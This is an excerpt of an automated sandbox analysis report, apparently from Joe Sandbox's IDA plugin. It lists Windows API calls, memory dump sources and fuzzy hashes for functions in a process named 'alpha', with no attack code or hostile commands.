                                                                                                                                                                        • _get_osfhandle.MSVCRT ref: 00007FF6E9433584
                                                                                                                                                                        • GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E943359C
                                                                                                                                                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335C3
                                                                                                                                                                        • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335D9
                                                                                                                                                                        • GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E94335ED
                                                                                                                                                                        • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF6E94232E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF6E9433602
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: LockShared$AcquireConsoleFileHandleModeReleaseType_get_osfhandle
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 513048808-0
                                                                                                                                                                        • Opcode ID: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction ID: 6d89b331c714036a7180df0c3f0021553935c5f3d4206415e7aa102b74b4b422
                                                                                                                                                                        • Opcode Fuzzy Hash: 03f01a8104886db99b7aad40b47997af4647daf6f98f1b4f0a1f116e85409c1b
                                                                                                                                                                        • Instruction Fuzzy Hash: D1115433A08646C6E7248F74A5882786A90FF59B65F549334DD2F827D0DE3ED44CC706
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
                                                                                                                                                                         • Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                         • Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 4104442557-0
                                                                                                                                                                        • Opcode ID: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction ID: 9378786cca3953a8bd63b0058cb05f6ae3d6f9ca2c5b407d64a02f3d10836d89
                                                                                                                                                                        • Opcode Fuzzy Hash: b889aecb1d922b30460546f960472bac4e2facbbb0b8017922a5a639f3fd93e9
                                                                                                                                                                        • Instruction Fuzzy Hash: 31112122A05B42CBEB00DFB4E8442A833A4FF59758F400A34EA6D87B54EF7DD5A9C345
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: iswdigit
• String ID: GeToken: (%x) '%s'
• API String ID: 3849470556-1994581435
• Opcode ID: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
• Instruction ID: 38e1565347d210376ff9ddeae28bee47200d3431c281a82e85d4042e67bc2b76
• Opcode Fuzzy Hash: b1c74980886186fc2843b8190b4a082341e47de456d20d62b3525a594f11c7d8
• Instruction Fuzzy Hash: 77516333A08646C5EB209F66A44837A77A0FF44B14F508435DA4DC3390EF7EE888C71A
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CurrentDirectorytowupper
• String ID: :$:
• API String ID: 238703822-3780739392
• Opcode ID: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
• Instruction ID: 82d12ce4bf942a1684c69ba2ab26bc134c6926f5cfbca28edf2385294d2a7428
• Opcode Fuzzy Hash: dcf03791281f7c84e6b05e0af004632f1679b3806237a1a98edf480c5c28324e
• Instruction Fuzzy Hash: DB11E253609741C6EB2ACF71A819379B6A0EF49B99F498132DD0D87790DF3DE049C70A
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: memset$CurrentDirectorytowupper
• String ID:
• API String ID: 1403193329-0
• Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
• Instruction ID: b3fa9b21cb5155f41ee51955f32ccf242236cfbbf832bdeb7c7a47d0c483f8a6
• Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
• Instruction Fuzzy Hash: 0C51A027A09682C5EB25DF3098097BA77B0FF49B58F458135CA0D87694EE3ED54CC70A
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ErrorModememset$FullNamePath_wcsicmp
• String ID:
• API String ID: 2123716050-0
• Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction ID: 6a74fab02a1f0d28e1f356b3ed3f6fe3f1767ec2acd278ce82177189d1a1a94e
• Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
• Instruction Fuzzy Hash: 47418933709AC2CAEB768F21D8543E927A4EF49B88F444134DA4D8AA98DE3DD249C705
APIs
  • Part of subcall function 00007FF6E94333A8: iswspace.MSVCRT(?,?,00000000,00007FF6E944D6EE,?,?,?,00007FF6E9440632), ref: 00007FF6E94333C0
• iswspace.MSVCRT(?,?,?,00007FF6E94332A4), ref: 00007FF6E943331C
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: iswspace
• String ID: off
• API String ID: 2389812497-733764931
• Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction ID: c5f65b2d97c090f4b4ea1a4f1c25f9cc56675cff7fdb8bff946d33e9c3969f13
• Opcode Fuzzy Hash: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
• Instruction Fuzzy Hash: 7B213623E0C647C2FA649F75A45937A66A0EF45F90F98C134DD0AC7681DE2EE848C30A
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
• Associated: 00000006.00000002.1430320791.00007FF6E9420000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430370649.00007FF6E9452000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E945D000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9461000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E946F000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430390023.00007FF6E9474000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000006.00000002.1430471961.00007FF6E9479000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcschr$Heapiswspace$AllocProcess
• String ID: %s=%s$DPATH$PATH
• API String ID: 3731854180-3148396303
• Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction ID: 7a47398dabc748fbbe14b36771e5c1966389367f6e7845549214a74ccfe482b6
• Opcode Fuzzy Hash: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
• Instruction Fuzzy Hash: 5D215B23B09656C1EB64DFA5E44037927A0AF89F80F884135DD0EC7395EE3EE549CB4A
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: wcscmp
• String ID: *.*$????????.???
• API String ID: 3392835482-3870530610
• Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
• Instruction ID: efaf3a1b58be26ece150d6756f1c115eec6304c6c10baa4a80f4dbd39f54c2f6
• Opcode Fuzzy Hash: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
• Instruction Fuzzy Hash: C8115226B18A52C1EB64CF37A44467DB2A1EF48B80F195031DE8D87B85DE3EE445C705
APIs
  • Part of subcall function 00007FF6E9433C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF6E9433D0C
  • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D2F
  • Part of subcall function 00007FF6E9433C24: iswalpha.MSVCRT ref: 00007FF6E9433D4F
  • Part of subcall function 00007FF6E9433C24: towupper.MSVCRT ref: 00007FF6E9433D75
  • Part of subcall function 00007FF6E9433C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF6E9433DBF
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426ABF
• RtlFreeHeap.NTDLL ref: 00007FF6E9426AD3
  • Part of subcall function 00007FF6E9426B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B8B
  • Part of subcall function 00007FF6E9426B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF6E9426AE8,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B97
  • Part of subcall function 00007FF6E9426B84: RtlFreeHeap.NTDLL ref: 00007FF6E9426BAF
  • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B39
  • Part of subcall function 00007FF6E9426B30: RtlFreeHeap.NTDLL ref: 00007FF6E9426B4D
  • Part of subcall function 00007FF6E9426B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9426AF1,?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925), ref: 00007FF6E9426B59
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E944EA0F,?,?,?,00007FF6E944E925,?,?,?,?,00007FF6E942B9B1), ref: 00007FF6E9426B03
• RtlFreeHeap.NTDLL ref: 00007FF6E9426B17
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
• String ID:
• API String ID: 3512109576-0
• Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
• Instruction ID: 23ce1be0056c7fe227dc4f94e2deeb969b17616cb3320d4c40f024db73ebf4b4
• Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
• Instruction Fuzzy Hash: B1218E63A09A86C6EB04DF6594543B87BA0FF59B45F148032CA0EC7355EF3EA44AC31A
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6D0
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B6E7
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B701
• HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E942AF82), ref: 00007FF6E942B715
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$Process$AllocSize
• String ID:
• API String ID: 2549470565-0
• Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
• Instruction ID: d7072537c0516c7a496935c98e734932356321587ea3ed7546fa5a7b06870fbb
• Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
• Instruction Fuzzy Hash: 2B211F77A09782C6EA148F55E440278BAA5FF89B80B589431DA0E83754EF3DE849C709
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456C5
• RtlFreeHeap.NTDLL ref: 00007FF6E94456D9
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF6E9445433,?,?,?,00007FF6E94469B8,?,?,?,?,?,00007FF6E9438C39), ref: 00007FF6E94456FD
• RtlFreeHeap.NTDLL ref: 00007FF6E9445711
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$FreeProcess
• String ID:
• API String ID: 3859560861-0
• Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
• Instruction ID: 67d30fe882b0f2402c607739c5c18ba23279a5c016b85e152fa12516c14bfebc
• Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
• Instruction Fuzzy Hash: 8D11F572A04B91C6EB008F56E4441ADBBB0FB89F84B598125DB4E43728EF38E45AC744
APIs
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
• String ID:
• API String ID: 140117192-0
• Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
• Instruction ID: 82cc835333b58ddb4b5ef44f61bc9ac8831998dc97b3b6812f151f29c402abf3
• Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
• Instruction Fuzzy Hash: BE21AF36918B45C5EB40AF94E88436973A4FF88B54F500136EA8D82764DF7EE488CB0A
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AD6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E9434AEF
  • Part of subcall function 00007FF6E9434A14: GetEnvironmentStringsW.KERNELBASE(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A28
  • Part of subcall function 00007FF6E9434A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A66
  • Part of subcall function 00007FF6E9434A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A7D
  • Part of subcall function 00007FF6E9434A14: memmove.MSVCRT(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434A9A
  • Part of subcall function 00007FF6E9434A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF6E94349F1), ref: 00007FF6E9434AA2
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF6E9428798), ref: 00007FF6E943EE64
• RtlFreeHeap.NTDLL ref: 00007FF6E943EE78
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
• String ID:
• API String ID: 2759988882-0
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: ConsoleTitle
• String ID: -
• API String ID: 3358957663-3695764949
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: _wcsnicmpswscanf
• String ID: :EOF
• API String ID: 1534968528-551370653
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306D6
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E94306F0
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E943074D
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF6E942B4DB), ref: 00007FF6E9430762
Memory Dump Source
• Source File: 00000006.00000002.1430339071.00007FF6E9421000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF6E9420000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff6e9420000_alpha.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0